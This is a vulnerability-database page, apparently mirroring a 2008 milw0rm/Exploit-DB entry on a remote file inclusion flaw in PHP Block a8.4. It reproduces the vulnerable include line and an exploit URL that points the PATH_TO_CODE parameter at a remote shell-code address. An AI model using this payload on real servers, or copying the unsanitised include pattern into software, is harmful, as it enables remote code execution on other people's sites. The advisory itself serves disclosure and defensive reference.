header-logo
Suggest Exploit
vendor:
PHP Block a8.4
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PHP Block a8.4
Affected Version From: a8.4
Affected Version To: a8.4
Patch Exists: No
Related CWE: N/A
CPE: a:phpblock:php_block_a8.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Block a8.4

PHP Block a8.4 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it as if it was a local file. This vulnerability is due to the application not properly sanitizing user input supplied through the PATH_TO_CODE parameter. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an unsuspecting user.

Mitigation:

Input validation should be used to ensure that user supplied data is properly sanitized.
Source

Exploit-DB raw data:

Script Name : PHP Block a8.4
 
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
 
Error : include_once $PATH_TO_CODE."/script/fonction.php";
 
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
 
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]

Navigation

Suggest Exploit

Services By CQR